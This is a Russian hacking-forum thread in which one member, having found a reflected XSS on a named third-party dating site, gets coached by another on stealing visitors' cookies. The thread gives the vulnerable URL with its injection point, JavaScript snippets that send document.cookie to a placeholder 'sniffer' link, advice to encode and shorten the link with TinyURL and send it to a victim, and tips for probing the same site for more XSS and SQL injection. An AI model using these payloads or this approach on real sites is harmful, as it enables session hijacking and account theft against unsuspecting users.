Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - поиск пасивной xss
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Взлом и безопасность / WEB сайтов RSS подписка на сообщения с форума Subscribe
Технологии взлома сайтов - xss, sql injection. Для сообщений "взломайте мне сайт" есть форум "Предложения работы".

Новая тема Наиболее обсуждаемые темы Наиболее посещаемые темы
Поиск 
Период
Перейти

Страницы сообщения: [1] [2] [3] Просмотров - 9558
поиск пасивной xss
Добавить этот топик в закладки »
RSS-лента ответов »Subscribe
winston14


Member
# | Сообщение добавлено 26.01.2013 12:23:22
Отредактировано 26.01.2013 13:20:56 by winston14
так ну xss я нашол, теперь как слить куксы? через онлайн сниффер можна?
Сказать спасибо Ответить Цитировать

Virous




Gold Member
# | Сообщение добавлено 26.01.2013 16:24:29
С помощью XSS закидываете код, который отправляет Cookie файлы в виде GET запроса (можно отдельное окно, можно невидимый IFrame).
 
Ахтунг! Собакирен мит зубен клац, клац! Зубен зи дойч!
Сказать спасибо Ответить Цитировать

winston14


Member
# | Сообщение добавлено 26.01.2013 16:34:24
я ранее дело с xss не имел, и не знаю как это сделать, куда код залить?
Сказать спасибо Ответить Цитировать

Virous




Gold Member
# | Сообщение добавлено 26.01.2013 16:44:09
В смысле куда? Что за XSS Вы нашли? XSS - это класс уязвимости, позволяющей залить свой код в программный компонент.
 
Добавлено 26.01.2013 16:44:26 (через 17 секунд )
 
Нашел XSS и залил код - это синонимы
 
Ахтунг! Собакирен мит зубен клац, клац! Зубен зи дойч!
Сказать спасибо Ответить Цитировать

winston14


Member
# | Сообщение добавлено 26.01.2013 16:48:12
я пауком просканил один сайт, и вот что получил Возможно выполнение атаки межсайтовый скриптинг. Межсайтовый скриптинг (Cross site scripting или XSS) это возможность вставки HTML кода в уязвимую страницу. Инъекция кода осуществляется через все доступные способы ввода информации. Успешное завершение атаки может привести к использованию значений различных переменных, доступных в контексте сайта, записи информации, перехвату пользовательских сессий и т.д.
 
Запрос для выполнения атаки:
 
http://enzocom.net/user-search.php?age_from=1&age_to=1®ion_id=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%29%3C%2Fscript%3E%3C%22&city_id=1&sex=1&online=1&orientation=1&purpose=1?adv=1&X=1d86987a445c4f00f192e7634c7222e6
Сказать спасибо Ответить Цитировать

Virous




Gold Member
# | Сообщение добавлено 26.01.2013 17:23:15
А. Понятно. Я немного упростил адрес XSS: http://enzocom.net/user-search.php?age_from=1&age_to=1%C2%AEion_id=%22%3Ehallo%3C%22
Видите выделенное полужирным hallo? Это место, куда Вы можете вставить любой код, включая код отправки Cookie на Ваш сервер. Далее только зашифруйте URL, упакуйте TinyMCE и отправьте жертве.
 
Примечание: опасайтесь XSS фильтров, встроенных во все современные браузеры.
 
Добавлено 26.01.2013 20:21:24 (через 3 часа 58 минут 9 секунд )
 
Тьфу, не TinyMCE, а TinyURL :)
 
Ахтунг! Собакирен мит зубен клац, клац! Зубен зи дойч!
Сказать спасибо Ответить Цитировать

winston14


Member
# | Сообщение добавлено 26.01.2013 23:02:43
тоисть вместо hallo можна поставить javascript:document.write('<script>img = new Image(); img.src = "ссылка на сниффер"+document.cookie;</script>')   ????
Сказать спасибо Ответить Цитировать

Virous




Gold Member
# | Сообщение добавлено 26.01.2013 23:24:52
Скорее
 
Text
  <img src="" id="xxx"><script>$('#xxx').src='Ссылка_'+document.cookie;</script>

Но это вряд ли сработает, ибо:
 
winston14

Примечание: опасайтесь XSS фильтров, встроенных во все современные браузеры.

Здесь все чуть сложнее
 
Ахтунг! Собакирен мит зубен клац, клац! Зубен зи дойч!
Сказать спасибо Ответить Цитировать

winston14


Member
# | Сообщение добавлено 26.01.2013 23:34:43
я так понимаю лучше фейк состряпать чем куксы сливать. этот сайт дырявый как носки а сделать ничего нельзя.
но да ладно спасибо и на этом )))
Сказать спасибо Ответить Цитировать

Virous




Gold Member
# | Сообщение добавлено 26.01.2013 23:35:40
Фейк никогда не лучше. Нужно искать пассивные XSS и SQL_Inject. Я почти уверен, что они там есть.
 
Добавлено 26.01.2013 23:37:49 (через 2 минуты 9 секунд )
 
Я думаю, имеет смысл залить файл и поискать XSS в названии, описании и.т.д.
 
Добавлено 26.01.2013 23:42:07 (через 4 минуты 18 секунд )
 
И настройки профиля тоже проверьте, названия папок. Все, в общем, на что Вы можете влиять.
 
Ахтунг! Собакирен мит зубен клац, клац! Зубен зи дойч!
Сказать спасибо Ответить Цитировать

Страницы сообщения: [1] [2] [3]
Только зарегистрированные пользователи могут оставлять сообщения в форуме

Зарегистрироваться *** Авторизоваться

 Последние новости и статьи  Последние сообщения с форумов
  • WhatsApp уверяет пользователей, что Facebook не имеет доступа к и...
  • Однострочная команда в Windows 10 может повредить жесткий диск с ...
  • Кардерский форум Joker’s Stash объявил о закрытии
  • Релиз ядра Linux 5.9
  • Российские хакеры вооружились уязвимостью Zerologon
  • Тысячи приватных звонков американских заключенных оказались в отк...
  • Шифровальщик атаковал немецкую компанию Software AG
  • Злоумышленники используют службу Windows Error Reporting для бесф...
  • Microsoft предупредила о вымогателях, которые выдают себя за МВД ...
  • Инфостилер Valak ворует информацию из почтовых систем Microsoft E...

    Все новости... Все статьи... Прислать новость RSS
  • Взлом и безопасность / ICQ,AIM,YAHOO,QIP » Услуги Хакера @ Заказать взлом @ Нужен хакер@Alex89618506139
  • Взлом и безопасность / Программы » Услуги Хакера @ Заказать взлом @ Нужен хакер@Alex89618506139
  • Взлом и безопасность / Разное » Re: Помощь в скачивании платного файла
  • Взлом и безопасность / Разное » Помощь в скачивании платного файла
  • Разное / Куплю, приму в дар » куплю | ваш аккаунта | получение нового | описание внутри
  • Разное / Предложения работы » Специалиста
  • Downloads / Другое » Re: Нужна база емайл адресов юр. лиц
  • Downloads / Другое » Нужна база емайл адресов юр. лиц
  • Разное / Предложения работы » Нужен взлом mail и gmail почты
  • Взлом и безопасность / Разное » Re: Нужна помощь в скачивании файла

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 1996-2020. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    contador de visitas счетчик посещений

    #{title}

    #{text}

    x

    #{title}

    #{text}